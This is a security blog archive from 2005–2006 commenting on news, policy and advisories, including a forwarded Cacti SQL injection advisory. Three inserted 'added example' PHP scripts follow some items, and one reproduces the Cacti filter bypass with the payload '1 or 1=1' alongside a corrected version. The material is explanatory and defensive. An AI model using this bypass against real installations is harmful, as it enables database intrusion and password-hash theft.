Bizarre notepad bug that really exists. If you type a phrase consisting of a 4 letter word, then two three letter words, then a 5 letter word, save it, then reopen it, the text will be corrupted and unreadable. There is a claim that not all words cause this to occur. See the linked story for examples of what does work.

There was a great quote:

If Microsoft can't keep strange bugs out of Windows' simplest application, we'd better get used to the monthly security patch cycle.
*************************************************************************
SANS NewsBites April 25, 2006 Vol. 8, Num. 33
*************************************************************************
-- snip --
--Researcher Warns Some Online Banking Sites Don't Provide Adequate Authentication
(20 April 2006)
SANS Institute chief research officer Johannes Ullrich says many widely used online banking sites do not use authentication technology to assure that they are who they claim to be. Banks would be well advised to send users to an HTTP Secure (HTTPS) web page which uses the Secure Sockets Layer (SSL) security protocol instead of merely encrypting login forms. Web pages that do not use HTTPS make themselves vulnerable to DNS spoofing in which attackers try to trick users into visiting phony web sites in an attempt to gather their account information.
http://www.computerworld.com/printthis/2006/0,4814,110738,00.html
Internet Storm Center: http://isc.sans.org/diary.php?storyid=1278
-- snip --
[Editor's Note (Axley): This is pure silliness. Their "head researcher" only now has discovered that this has been going on? I certainly applaud their efforts to raise awareness of the issue and clarify it as an authentication issue, not an encryption one, albeit late to the game, and will likely contribute my list to their list of financial institutions not authenticating their login pages (which are often on their homepages) with SSL. I had to deal with this issue at AT&T Wireless with their homepage and also am dealing with it as we speak at my present employer so it is not new. Many companies seem content these past few years to be "cream of the crap" instead of "cream of the crop" -- only striving to be "as good as" (read: "as bad as") the next guy. My prediction is that it won't stay this way since phishing is getting solidified as its own industry now. ]
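A check for the point made above, as an added example (not code from SANS, the ISC diary or this blog): it parses a page and flags login forms the user cannot authenticate, in particular the case where the form posts to HTTPS but the page carrying it was served over plain HTTP. The HTML and hostnames are constructed for the example.

```php
<?php
// Added example. Flags login forms a user cannot authenticate: even if the
// credentials are posted over HTTPS, a form delivered over plain HTTP can be
// replaced by a spoofed page (e.g. after DNS spoofing) that looks the same
// and posts somewhere else.

function audit_login_forms(string $page_url, string $html): array
{
    $findings = [];
    $page_scheme = strtolower((string) parse_url($page_url, PHP_URL_SCHEME));

    libxml_use_internal_errors(true);      // tolerate real-world markup
    $doc = new DOMDocument();
    $doc->loadHTML($html);

    $n = 0;
    foreach ($doc->getElementsByTagName('form') as $form) {
        $n++;
        // Only forms that collect a credential are of interest here.
        $has_password = false;
        foreach ($form->getElementsByTagName('input') as $input) {
            if (strtolower($input->getAttribute('type')) === 'password') {
                $has_password = true;
                break;
            }
        }
        if (!$has_password) {
            continue;
        }

        // A relative or empty action inherits the page's scheme.
        $action = $form->getAttribute('action');
        $action_scheme = strtolower((string) parse_url($action, PHP_URL_SCHEME));
        if ($action_scheme === '') {
            $action_scheme = $page_scheme;
        }

        if ($action_scheme !== 'https') {
            $findings[] = "form $n: credentials are posted over $action_scheme "
                . "(action \"$action\")";
        }
        if ($page_scheme !== 'https') {
            // The case the NewsBites item describes: encrypted submission, but an
            // unauthenticated page, so the user cannot tell who served the form.
            $findings[] = "form $n: login form served over $page_scheme; only an "
                . "HTTPS page lets the user verify who served the form";
        }
    }
    return $findings;
}

// Constructed page: a bank-style homepage served over HTTP whose login form
// posts to HTTPS, plus a harmless search form that must not be reported.
$html = <<<HTML
<html><body>
<form action="https://online.bank.example/login" method="post">
  <input type="text" name="user"> <input type="password" name="pass">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
</body></html>
HTML;

foreach (audit_login_forms('http://www.bank.example/', $html) as $finding) {
    echo $finding, PHP_EOL;
}
```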
--Microsoft to End Support for "Outdated" Operating Systems
(18 April 2006)
Microsoft plans to retire support for Windows 98, Windows 98 SE and Windows ME on July 11, 2006; after that date, there will be no more security updates for these versions of the company's operating systems. Microsoft calls these systems "outdated" and recommends that users upgrade to a more secure operating system, such as Windows XP.
http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1182527,00.html

http://thomas.loc.gov/cgi-bin/query/z?c109:H.R.3997:

Call your representatives now to get them to oppose this legislation. This is the bill that passed out of committee and would seriously weaken the gains that have been made over the past few years in data breach notification, as well as preventing people from preemptively "freezing" their credit file from being used to open new accounts--something that itself could curb much of the ID theft problems (and perhaps some consumer credit problems...)

It is such BS that Republicans are all about state's rights...except in this case...and that case...and this other case... Hypocrites!


http://www.microsoft.com/downloads/details.aspx?familyid=eae20f0f-c41c-44fe-84ce-1df707d7a2e9&displaylang=en

This update starts the driver secdrv for SafeDisc from Macrovision at boot time to allow you to run games as a non-admin, lower-privilege user. Games that use SafeDisc otherwise require you to play the game as Administrator in order to have the rights to start the Manual service. Now, if only PunkBuster were to do the same...

Have I mentioned that DRM and copy protection sucks?


Boing Boing: Encrypted VOIP from PGP creator Zimmermann: Zfone

Encrypted VOIP from PGP creator Zimmermann: Zfone

Good reason to switch to VOIP instead of traditional phones to protect yourself from Big Brother Bush.


Freedom to Tinker » Blog Archive » RIAA Says Future DRM Might “Threaten Critical Infrastructure and Potentially Endanger Lives”

Yet another reason DRM sucks. But unbelievably, the "BSA, RIAA, MPAA, and friends" actually are objecting to DRM exemptions for critical systems!

I was also reading recently about how much extra processor and battery life is sucked up when playing DRM files that have to constantly be checking for a valid license and other cruft.


DHS Gets Another F in Computer Security

Is anyone surprised? They can't even manage a disaster in the physical world (Katrina), what makes you think they can manage the disaster that DHS is? Another black mark for Chertoff and the Bush administration.

Why does the public still think that the Bush administration is strong on defending America?

Most federal agencies that play key roles in the war on terror are doing a dismal job of protecting their computers and information networks from hackers and viruses, according to portions of a report to be released by a key congressional oversight committee Thursday.

The Department of Homeland Security, which is charged with setting the government's cyber security agenda, earned a grade of F for the third straight year from the House Government Reform Committee. Other agencies whose failing marks went unchanged from 2004 include the departments of Agriculture, Defense, Energy, State, Health and Human Services, Transportation, and Veterans Affairs.


Well, at least they're committed to national security consistent conservative... I give up.

"The same Bush administration review panel that approved a ports deal involving the United Arab Emirates has notified a leading Israeli software company that it faces a rare, full-blown investigation over its plans to buy a smaller rival.

The objections by the FBI and Pentagon were partly over specialized intrusion detection software known as "Snort," which guards some classified U.S. military and intelligence computers."

http://redmondmag.com/news/article.asp?editorialsid=7219


Crimeware coverage by Scientific American

Crimeware coverage by Scientific American. Several good stats and comments from attendees of the RSA Conference. Why the increase in crime on the Internet? Well, it's where the money is and there is very little risk of getting caught. Job security for a security guy like me though.


IDP : Investigation

Help us help you determine whether the TSA told the 9th Circuit the truth. Can you fly without ID? According to what the government told the 9th Circuit Court of Appeals in the Gilmore case, you can – you need only submit to secondary screening in order to fly anonymously.

I am just reading a Lee Child book from 1999 (pre 9/11) where the main character flew under president's names. Would be fun if you could get away with this. Might try it on my next flight...

I almost laughed when I went to the Westin building in Seattle and the guard was going to let me in but I had to show him my ID to get a badge, presumably. But it was funny that someone who worked in the building that I was coming to see happened to come by at the same time and was able to take me in without showing ID or getting a badge. Go figure. So, how important for security _is_ showing an ID then? And, if your threat model includes suicide bombers, what does an ID buy you in terms of protection?

If your employer or corrupt, undemocratic, dictator-based government uses a filtering service such as Secure Computing's SmartFilter to block access to BoingBoing.net, you can try the following workarounds...

Boing Boing's Guide to Defeating Censorware

Of course, good network admins take evasive action for these evasive actions, but the reality is that there are always ways to get around proxies. Especially when they do stupid shit like "Smart" filter does. Smartfilter will often block an entire domain in a category for one single page that may fit in that category. They blocked attrition.org under "criminal skills" and several other security sites. I recall them blocking geocities.com or something like it when only some of the pages met the criteria. Why don't they block specific URLs or URL patterns instead of an entire domain?


The Torn-Up Credit Card Application

They tore up their own credit card application, then changed the address and phone number and still got the card!

I always shred the applications I get in the mail.

And the good thing is that in Seattle, you can either recycle your shreddings or put them in your yard waste container.


Australian IT - Oracle on track of secure search (MARCH 07, 2006)

"We have the security problem solved. That's what we're good at, and that's the hard part of the problem." -- Larry Ellison

Hell has not frozen over so I don't believe him.


Black Box Voting : 2-23-06: Someone accessed 40 Palm Beach County voting machines Nov 2004

This is good work. NOW do the naysayers see why we need voter verifiable paper ballots?


On The McLaughlin Group yesterday, there was a lot of ridiculous sophistry regarding racial profiling as a valuable and necessary tradeoff between liberty and security.

Bruce Schneier has written many times on this subject. In this piece, there is a perfect quote about what is misguided about the position that racial profiling is not only necessary, but is actually effective, "Whenever you design a security system with two ways through -- an easy way and a hard way -- you invite the attacker to take the easy way. Profile for young Arab males, and you'll get terrorists that are old non-Arab females."

"The enemy could easily get around it by recruiting people who don't look like the profile" -- Eleanor Clift, the only one who gets it.

"We need smart profiling, not racial profiling" -- John McLaughlin, who also gets it, sort of. He was pushing for profiling Muslims, who I don't believe are the only terrorists now, in the past, or in the future. He is right about one thing: religion has been the excuse for all kinds of atrocities all over the world. But it has not been limited to Muslim extremists. There are Christian extremists even in our own country who would love to turn this country into a theocracy.

Best new word: "Muslometer"; a call for venture capitalists to develop a device to gauge whether someone is a Muslim or not.


When people tried to evacuate during Hurricane Katrina, airline security prevented many from being able to leave before the airport had to be shut down. This is where a threat model would have helped make the right decision in the face of competing risks. And where "zero tolerance" policies really show how they are "zero thought" policies.

Hurricane Security and Airline Security Collide

And recently, if you thought that airline security was too strict, it is working. You should know it is only designed to make you _think_ that so that you will keep flying. If they really based it on a real threat model, you would have a very different traveling experience and stupid things like taking fingernail clippers and metal knives away, but allowing you to have full glass bottles of alcohol on planes would not happen. My cousin, who was in the army, recently said, "I'd like a terrorist to try to attack me with fingernail clippers." The implication was that he would kick their ass to a bloody pulp before they got anywhere because that is stupidity masquerading as a threat to airline security.

Here is what happens when a politician says The Emperor Has No Clothes. Good for him to speak the truth. The homeland security budget could be put to use protecting against real threats.

Real threats like the fact that our air traffic control systems have shitty security. It is so bad, they lack cyber security. Oooh.
FAA air-traffic systems lack cyberprotections, GAO finds


LiveAmmo Security Blog: Drunk drivers granted access to breathalyser source code

If only I was able to be granted the source code for the laser detector that incorrectly clocked me over the speed limit...

I like when judges don't treat technology as infallible. In my case, there was not any argument that could detract from the "evidence", even the likely EMI!

Oh, and let's also demand the same for our voting machines!

"A panel of judges in the Florida county of Sarasota has granted a request by a group of over 150 citizens accused of drink-driving to view the source code of the breathalyser that was used to determine their breath alcohol levels.

Attorneys for the defendants had filed a motion to review the source code for the Intoxilyzer 5000 breathalyzer in October.

'The defendants have established that the source code is material to their theory of defense in these cases,' judges David Denkin, Kimberly Bonner and Judy Goldman wrote in their ruling dated 2 November."


This link wasn't working at the time of posting, but it is interesting to see how you can use infrared to determine a combination from a recently-used keypad. There must be some equipment that would cost less than $5000 that could do this? I'll have to check the local spy shop.

http://lcamtuf.coredump.cx/tsafe/


GNU project founder foils UN security

Glad my passport does not expire for many years to come. Perhaps by then passports won't have RFID tags in them any longer. But if they do, I guess this is an easy way to keep myself from being a target for a shoulder-fired missile overseas.

Founder of the GNU project, Richard Stallman, got in trouble at the UN World Summit on the Information Society in Tunis for putting tin foil around his RFID.

Signaling Vulnerabilities in Wiretapping Systems

Ahh, too bad I don't work for a telecom company anymore (actually, it is good). This might be fun to test out...

In a research paper appearing in the November/December 2005 issue of IEEE Security and Privacy, we analyzed publicly available information and materials to evaluate the reliability of the telephone wiretapping technologies used by US law enforcement agencies. The analysis found vulnerabilities in widely fielded interception technologies that are used for both "pen register" and "full audio" (Title III / FISA) taps. The vulnerabilities allow a party to a wiretapped call to disable content recording and call monitoring and to manipulate the logs of dialed digits and call activity. These countermeasures do not require cooperation with the called party, elaborate equipment, or special skill.

Peter Gutmann wrote a great summary of the lengths that many have to go to in order to get ISAKMP implementations to interoperate.

I had a hell of a time trying to get Windows 2000/XP IPSec to work with FreeS/WAN in the past. It was very difficult to debug what was going on and I resorted to using tools that translated FreeS/WAN configuration into Windows IPSec configuration so that I was sure that the settings were correct.

>On Sat, 19 Nov 2005, Peter Gutmann wrote:
>>- The remaining user base replaced it with on-demand access to network
>> engineers who come in and set up their hardware and/or software for them and
>> hand-carry the keys from one endpoint to the other.
>>
>> I guess that's one key management model that the designers never
>> anticipated... I wonder what a good name for this would be, something better
>> than the obvious "sneakernet keying"?
>
>Actually this is a good thing.

Unless you're the one paying someone $200/hour for it.

>Separation of the key distribution channel from the flow of traffic encrypted
>under those keys. Making key distribution require human
>attention/intervention.

Somehow I suspect that this (making it so unworkable that you have to hand-carry configuration data from A to B) wasn't the intention of the IKE designers :-). It's not just the keying data though, it's all configuration information. One networking guy spent some time over dinner recently describing how, when he has to set up an IPsec tunnel where the endpoints aren't using completely identical hardware, he uses a hacked version of OpenSWAN with extra diagnostics enabled to see what side A is sending in the IKE handshake, then configures side B to match what A wants. Once that's done, he calls A and has a password/key read out over the phone to set up for B.

Peter.


There are still no known attacks against encryption schemes that make use of these, but certainly anything relying on these hashes for integrity protection should switch to alternate mechanisms.

Sent: Monday, November 14, 2005 10:48 AM
To: cryptography@metzdowd.com
Subject: MD4 and MD5 collision generators

I am releasing my collision generators for MD4 and MD5. They have significant time improvements over the ones described in the papers by Wang, et al.

MD4 collisions can be generated almost instantly, MD5 can be generated in approximately 45 minutes on my p4 1.6ghz (on average).

http://www.stachliu.com/collisions.html

Enjoy
-Patrick Stach


Rainbow Crack is a time/memory tradeoff tool that can break passwords knowing just the password hash. So, those people who still think that disclosing password hashes is not a big deal...

SANS documented and proved, using a modified version of Rainbow Crack, something that I have suspected for a while: that Oracle's proprietary password hashes are weak. There are plenty of good ways to do this that it's a wonder these days that people still roll their own crypto. The SANS team is releasing an update to Rainbow Crack that can crack Oracle passwords.


EFF: DocuColor Tracking Dot Decoding Guide

This is a breakthrough. It has been rumoured for years that printers and copy machines include secret codes on documents to track them back to the source machine but the EFF now has real evidence and even tools that you can use to perhaps decode your printer's secret tracking information.

This guide is part of the Machine Identification Code Technology project. It explains how to read the date, time, and printer serial number from forensic tracking codes in a Xerox DocuColor color laser printout. This information is the result of research by Robert Lee, Seth Schoen, Patrick Murphy, Joel Alwen, and Andrew "bunnie" Huang. We acknowledge the assistance of EFF supporters who have contributed sample printouts to give us material to study. We are still looking for help in this research; we are asking the public to submit test sheets or join the printers mailing list to participate in our reverse engineering efforts.

Wow. Note how she says that she researches "hacking techniques" as well as the network-security-centric language throughout. A CSO should not typically be operating at this level but rather at the "big picture" strategic level.

No wonder Oracle continues having application security and patch quality problems. Their CSO seems too busy hacking the network and writing articles about it and how bad vulnerability researchers are and not enough time executing on a strategy to improve the security posture of their software and processes. Some on security mailing lists are calling for her to resign.

-Jason

-----Original Message-----
From: isn-bounces@attrition.org [mailto:isn-bounces@attrition.org] On Behalf Of InfoSec News
Sent: Wednesday, October 19, 2005 12:03 AM
To: isn@attrition.org
Subject: [spam]::[ISN] Davidson: Lessons of warfare for IT security

http://www.fcw.com/article91127-10-17-05-Web

By Mary Ann Davidson
Oct. 17, 2005

As a security professional, I research the latest issues, threats and
hacking techniques. For pleasure, however, I read mostly military
history, which shapes my view of information security. As a result, I
offer the following lessons from military history for federal agency
information technology security professionals.

Most security professionals attempt to implement programs to defend
all access points because intruders need to find only one way in. But
because agency resources are finite, boundaries typically exceed
resources. To best apply limited resources to maximize defense
success, carefully select your turf.

Risk management approaches to security must move beyond identifying
and defending the most important assets to include an analysis of a
network's strategic points where intruders could attack.

Here are some IT security lessons from military history.


* Intelligence has value only if you act on it.

The Battle of Midway in June 1942 was arguably the turning point of
World War II in the Pacific rim. The victory hinged partly on U.S.
code crackers' breaking JN25 naval cipher to learn that the Japanese
planned to attack Midway. Adm. Chester Nimitz, commander of the U.S.
Pacific fleet, sent two carrier task forces to Midway to ambush the
Japanese Navy.

A second lesson is the hubris of assuming that enemies cannot break
ciphers and codes.

Security professionals have many means of defense at their disposal.
Through network mapping, they can determine the landscape of their
networks. Knowing how many systems are locked down and adequately
patched, they can assess their readiness. Using intrusion-detection
systems, they can know the types of probes the enemy has attempted.

But some organizations don't use or act on the intelligence they have.
Many turn off their auditing systems, fail to review the logs or
ignore alarms. A military parallel is Pearl Harbor, the attack in
which the United States ignored radar detecting the incoming Japanese
planes.


* Interior defensive perimeters are critical.

The network perimeter has disappeared as ubiquitous computing and
extranet access have surged. The model of hardened perimeters and
wide-open interiors is no longer adequate.

During the 1879 defense of Rorke's Drift in South Africa, about 150
British soldiers held off 4,000 Zulus by defending the inherently
indefensible. They created makeshift barricades from grain sacks and
biscuit boxes to secure the perimeter. They had fallback positions and
used them.

Security professionals can learn from this example. A network is not
defensible if attackers breach the perimeter and the rest of the
network is wide open.

Today, administrators segment networks with interior firewalls.
Tomorrow, networks may be able to create dynamic barriers in response
to worm and virus invasions.

Admirals and generals set strategies, but individuals who make
tactical decisions and take the initiative win battles. Every federal
agency employee has a responsibility to make IT security a priority.

Davidson is Oracle's chief security officer.


Hacks From Pax: PHP Web Application Security - The Community's Center for Security

Today on Hacks From Pax we'll be discussing PHP web application security. PHP is a great language for rapidly developing web applications, and is very friendly to beginning programmers, but some of its design can make it difficult to write web apps that are properly secure. We'll discuss some of the main security "gotchas" when developing PHP web applications, from proper user input sanitization to avoiding SQL injection vulnerabilities.

And, after hurricane Katrina, I would add that on top of a "lack of protective imagination", government continues to suffer as well from "pork barrel security projects" and "visible-but-ineffective security projects" that divert precious resources away from the real or more likely threats.

An unfortunate example of this is how "The federal government will pay the overtime of cops and emergency medical workers if the drill involves an act of terrorism, but it won't if locals rehearse for a natural disaster." So, the government is still making it difficult for localities, such as Seattle, to prepare for _likely threats_ and instead they have to fake it by running drills for the more unlikely terrorism-related scenarios instead. See Is Seattle Really Ready?

The other glaringly-apparent issue is that unqualified people are being put into positions of authority of governmental agencies that are in charge of protection and response for natural disasters and other events. I have lost my belief that government can be a reliable first line of assistance and that individual citizens and localities have to take matters into their own hands to be prepared, just like you would do for a retirement plan. Don't rely on social security, welfare, or unemployment as your sole safety net and now add to that governmental response to disasters.

I'm going to be reactivating my local neighborhood disaster preparedness facility since I can't believe that if there was any kind of significant event that there could be a reasonable expectation of a decent national response.

Forwarded from: Richard Forno

The London bombs went off over 12 hours ago.

So why is CNN-TV still splashing "breaking news" on the screen?

There's been zero new developments in the past several hours.
Perhaps the "breaking news" is that CNN's now playing spooky "terror
attack" music over commercial bumpers now filled with dramatic
camera-phone images from London commuters that appeared on the Web
earlier this morning.

Aside from that, the only new development since about noon seems to be
the incessant press conferences held by public officials in cities
around the country showcasing what they've done since 9/11 and what
they're doing here at home to respond to the blasts in London.....which
pretty much comes down to lots of guys with guns running around
America's mass transit system in an effort to present the appearance of
"increased security" to reassure the public. While such activities are a
political necessity to show that our leaders are 'doing something'
during a time of crisis we must remember that talk or activity is no
substitute for progress or effectiveness.

Forget the fact that regular uniformed police officers and rail
employees can sweep or monitor a train station just as well as a
fully-decked-out SWAT team -- not to mention, they know it better, too.
Forget that even with an added law enforcement presence, it's quite
possible to launch a suicide attack on mass transit. Forget that a
smart terrorist now knows that the DHS response to attacks is to
"increase" the security of related infrastructures (e.g., train
stations) and just might attack another, lesser-protected part of
American society potentially with far greater success. In these and
other ways today following the London bombings, the majority of security
attention has been directed at mass transit. However, while we can't
protect everything against every form of attack, our American responses
remain conventional and predictable -- just as we did after the Madrid
train bombings in 2004 and today's events in London, we continue to
respond in ways designed to "prevent the last attack."

In other words, we are demonstrating a lack of protective imagination.

Contrary to America's infatuation with instant gratification, protective
imagination is not quickly built, funded, or enacted. It takes years to
inculcate such a mindset brought about by outside the box,
unconventional, and daring thinking from folks with expertise and years
of firsthand knowledge in areas far beyond security or law enforcement
and who are encouraged to think freely and have their analyses seriously
considered in the halls of Washington. Such a radical way of thinking
and planning is necessary to deal with an equally radical adversary, yet
we remain entrenched in conventional wisdom and responses.

Here at home, for all the money spent in the name of homeland security,
we're not acting against the terrorists, we're reacting against them,
and doing so in a very conventional, very ineffective manner. Yet
nobody seems to be asking why.

While this morning's events in London are a tragedy and Londoners deserve
our full support in the coming days, it's sad to see that regarding the
need for effective domestic preparedness here in the United States,
nearly 4 years after 9/11, it's clear that despite the catchy
sound-bytes and flurry of activity in the name of protecting the
homeland, the more things seem to change, the more they stay the same.

-rick
Infowarrior.org


Another example of how PHP can be dangerous. Having to know the internal workings of variable acceptance to implement secure data checking seems to negate the value of having a higher-order programming language.

And, it is common in other languages to work with variables in a REQUEST structure of some sort.

PHP should provide a built-in set of semantics for data input filtering that work across all of the possible input types so that each application doesn't have to build their own. I even remember when you used to have to build your own PHP session management or use additional PHP modules (PHPlib was a great implementation) before it got rolled into PHP 4.

Also check out the Hardened-PHP Project for this advisory and many others for PHP applications, and some PHP security basics talks.

-J

-----Original Message-----
From: Stefan Esser [mailto:sesser@hardened-php.net]
Sent: Saturday, July 02, 2005 12:09 AM
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Advisory 03/2005: Cacti Multiple SQL Injection Vulnerabilities [FIXED]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Hardened - PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: Cacti Multiple SQL Injection Vulnerabilities
Release Date: 2005/07/01
Last Modified: 2005/07/01
Author: Stefan Esser [sesser@hardened-php.net]

Application: Cacti <= 0.8.6e
Severity: Wrongly implemented user input filters lead to
multiple SQL Injection vulnerabilities which can
lead e.g. to disclosure of the admin password hash
Risk: Critical
Vendor Status: Vendor has released an updated version
References: http://www.hardened-php.net/advisory-032005.php


Overview:

Quote from http://www.cacti.net
"Cacti is a complete network graphing solution designed to harness
the power of RRDTool's data storage and graphing functionality.
Cacti provides a fast poller, advanced graph templating, multiple
data acquisition methods, and user management features out of the
box. All of this is wrapped in an intuitive, easy to use interface
that makes sense for LAN-sized installations up to complex
networks with hundreds of devices."

Because it is usually fun to audit software which was previously
audited by experts from iDEFENSE we scanned through their reported
vulnerabilities and found that most are not properly fixed.


Details:

With the recent release of iDEFENSE's Cacti advisories version
0.8.6e of Cacti was released which according to iDEFENSE fixes
all reported flaws. But this is not true.

However the user input filters that were added to the Cacti
codebase to address the possible SQL Injections are wrongly
implemented and therefore can be tricked to let attackers
through.

To demonstrate the problem, here is a snippet of "graph.php"

/* ================= input validation ================= */
input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");
input_validate_input_number(get_request_var("local_graph_id"));
/* ==================================================== */

if ($_GET["rra_id"] == "all") {
$sql_where = " where id is not null";
}else{
$sql_where = " where id=" . $_GET["rra_id"];
}

On the first look this code looks safe, because it checks that
the 'rra_id' request parameter is either a number or the string
"all" before inserting it into a part of the SQL Query.

To realize that this check is however worth nothing one has to
dig deeper and look into the implementation of get_request_var()

function get_request_var($name, $default = "")
{
if (isset($_REQUEST[$name]))
{
return $_REQUEST[$name];
} else
{
return $default;
}
}

This actually means that the filter in this example is applied to
the content of $_REQUEST["rra_id"] and not to $_GET["rra_id"].
The problem with this is, that $_REQUEST is a merged version of
the $_GET, $_POST and $_COOKIE arrays and therefore array keys of
the same name will overwrite each other in $_REQUEST.

In the default configuration of PHP which is usually not changed
by anyone the merge order is GPC. This means when the request
contains both $_GET["rra_id"] and $_POST["rra_id"], only the
posted value will end up in the $_REQUEST array.

This however means, that nearly all of the implemented filters can
be bypassed by supplying the attack string through the URL and
supplying a good string through POST or through the COOKIE.


Proof of Concept:

The Hardened-PHP Project is not going to release exploits
for these vulnerabilities to the public.


Disclosure Timeline:

25. June 2005 - Contacted Cacti developers via email
29. June 2005 - Review of patch from our side
1. July 2005 - Release of updated Cacti and Public Disclosure


Recommendation:

We strongly recommend upgrading to Cacti 0.8.6f which you can get at

http://www.cacti.net/download_cacti.php


Summary for Secunia:

Because Secunia has proved several times in the past that they have
enormous problems with reading advisories and crediting the right
parties in their advisory rip-offs, here is a short summary.

This bug was not found by iDEFENSE. On the contrary it is a bug
in the input filters that were implemented because of iDEFENSE
and were nodded through by them.

GPG-Key:

http://www.hardened-php.net/hardened-php-signature-key.asc

pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1


Copyright 2005 Stefan Esser. All rights reserved.
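
As an added example (not Cacti's code and not part of the advisory), the following PHP script reproduces the bypass on the command line. It simulates how $_REQUEST is assembled under the default variables_order=GPC, feeds an attack string through the "GET" array and a harmless value through the "POST" array, and then shows the same check done correctly: read the parameter from one source, validate that value, and use only the validated value. The parameter values and the attack string are constructed for the demo.

```php
<?php
// Added example, not Cacti's code: reproduces the filter bypass described
// in the advisory on the CLI by simulating a request that carries the same
// parameter name in both the query string and the POST body.
// Assumption: variables_order=GPC (PHP's default), so when $_REQUEST is
// built, a POST value overwrites a GET value of the same name.

declare(strict_types=1);

/** Simulates how PHP assembles $_REQUEST under variables_order=GPC. */
function build_request(array $get, array $post, array $cookie): array
{
    // Later sources overwrite earlier ones: G, then P, then C.
    return array_merge($get, $post, $cookie);
}

/** Mirrors Cacti's helper: it reads the merged array, never $_GET itself. */
function get_request_var(array $request, string $name, string $default = ''): string
{
    return isset($request[$name]) ? (string) $request[$name] : $default;
}

/** Mirrors Cacti's regex filter; true means the value passed. */
function input_validate_input_regex(string $value, string $regex): bool
{
    return preg_match('/' . $regex . '/', $value) === 1;
}

/**
 * Vulnerable pattern: validate what get_request_var() returns (the merged
 * $_REQUEST value), then build the SQL fragment from $_GET.
 */
function vulnerable_where(array $get, array $post, array $cookie): string
{
    $request = build_request($get, $post, $cookie);
    if (!input_validate_input_regex(get_request_var($request, 'rra_id'), '^([0-9]+|all)$')) {
        throw new InvalidArgumentException('rra_id rejected');
    }
    $rra_id = $get['rra_id'] ?? '';
    return $rra_id === 'all'
        ? ' where id is not null'
        : ' where id=' . $rra_id;
}

/**
 * Fixed pattern: read the parameter from exactly one source, validate that
 * value, and use only the validated value afterwards. Casting to int means
 * nothing but digits can ever reach the query.
 */
function safe_where(array $get): string
{
    $rra_id = (string) ($get['rra_id'] ?? '');
    if ($rra_id === 'all') {
        return ' where id is not null';
    }
    if (preg_match('/^[0-9]+$/', $rra_id) !== 1) {
        throw new InvalidArgumentException('rra_id rejected');
    }
    return ' where id=' . (int) $rra_id;
}

// Constructed request: attack string in the URL, a harmless value in the
// body. Only the body value is seen by the filter in the vulnerable path.
$get    = ['rra_id' => '1 or 1=1'];
$post   = ['rra_id' => '1'];
$cookie = [];

echo 'vulnerable: ', vulnerable_where($get, $post, $cookie), "\n";

try {
    echo 'fixed: ', safe_where($get), "\n";
} catch (InvalidArgumentException $e) {
    echo 'fixed: ', $e->getMessage(), "\n";
}
```

Run it with the php CLI. vulnerable_where() returns a WHERE clause containing the attack string, because the regex was applied to the POST value "1", while safe_where() rejects the same GET input. The general lesson is independent of Cacti: a filter is only meaningful if it is applied to the exact variable that is later used.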


High-Entropy Randomness Generator

In this paper, we explain how to construct a High-Entropy Randomness Generator, suitable for a wide range of applications, including extremely demanding ones. We will explain and then use some key theoretical ideas:

* We start with a raw input, typically from a good-quality sound card.
* We obtain a reliable lower bound on the raw input’s entropy density (as defined in appendix A). This is calculated based on physics principles plus a few easily-measured macroscopic properties of the sound card. (This stands in stark contrast to other approaches, which obtain a loose upper bound based on statistical tests on the data.)
* We make use of the hash saturation principle, as discussed in section 3.2. The resulting output has essentially 100% entropy density. This is provably correct under mild assumptions.
* We use no secret internal state and therefore require no seed.
* We do not depend on assumptions about “one-way functions”.

We have implemented a generator using these principles. The result is what most people would call a True Random Number Generator. Salient engineering features include:

* It costs next to nothing. It uses the thermal fluctuations intrinsic to the computer’s audio I/O system.
* It emphatically does not depend on imperfections in the audio I/O system. Indeed, high-quality sound cards are much more suitable than low-quality ones. It relies on fundamental physics, plus the most basic, well-characterized properties of the audio system: gain and bandwidth.
* It can produce thousands of bytes per second of output.
* Remarkably little CPU time is required.
* It includes optional integrity-monitoring and tamper-resistance capabilities.
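
As an added example (not the paper's code), here is the bookkeeping behind the hash saturation step in PHP 8: raw samples are credited with a conservative entropy lower bound, and a 256-bit block is released only once the credited input entropy exceeds the block size. The per-sample bound, which the paper derives from the sound card's gain and bandwidth, is taken here as an assumed constructor parameter, and random_int() stands in for sound-card input so the script runs offline. The 20% margin is also an assumption of this demo.

```php
<?php
// Added example, not the paper's code: the accounting behind the "hash
// saturation" principle in the abstract. The hard part of the paper, the
// physics-based lower bound on entropy per sample, is assumed here as the
// $bits_per_sample parameter; random_int() is a constructed stand-in for
// sound-card samples so that the script runs without hardware.

declare(strict_types=1);

final class SaturatedHasher
{
    private string $buffer = '';
    private float $entropy = 0.0;        // entropy credited so far, in bits

    public function __construct(
        private float $bits_per_sample,  // conservative lower bound per raw sample
        private int $output_bits = 256,  // SHA-256 output size
        private float $margin = 1.2      // demand 20% more input entropy than output (assumed)
    ) {
        if ($bits_per_sample <= 0) {
            throw new InvalidArgumentException('need a positive entropy lower bound');
        }
    }

    /** Credit one raw 16-bit sample to the pool. */
    public function add_sample(int $sample): void
    {
        $this->buffer .= pack('v', $sample & 0xFFFF);
        $this->entropy += $this->bits_per_sample;
    }

    /** Samples still needed before the next block may be released. */
    public function samples_needed(): int
    {
        $deficit = $this->output_bits * $this->margin - $this->entropy;
        return $deficit <= 0 ? 0 : (int) ceil($deficit / $this->bits_per_sample);
    }

    /**
     * Release a full-entropy block only once the credited input entropy
     * exceeds the output size; otherwise return null rather than stretch
     * what is there. Nothing is carried across blocks, so there is no
     * secret internal state and therefore nothing to seed.
     */
    public function next_block(): ?string
    {
        if ($this->samples_needed() > 0) {
            return null;
        }
        $out = hash('sha256', $this->buffer, true);
        $this->buffer = '';
        $this->entropy = 0.0;
        return $out;
    }
}

// Assumed bound: each sample carries at least 0.5 bits of entropy, so one
// 256-bit block needs ceil(256 * 1.2 / 0.5) = 615 samples.
$gen = new SaturatedHasher(0.5);
$blocks = 0;
for ($i = 0; $i < 2000; $i++) {
    $gen->add_sample(random_int(0, 0xFFFF));   // constructed stand-in for audio input
    if (($block = $gen->next_block()) !== null) {
        $blocks++;
        echo bin2hex($block), "\n";
    }
}
echo "blocks released: $blocks\n";
```

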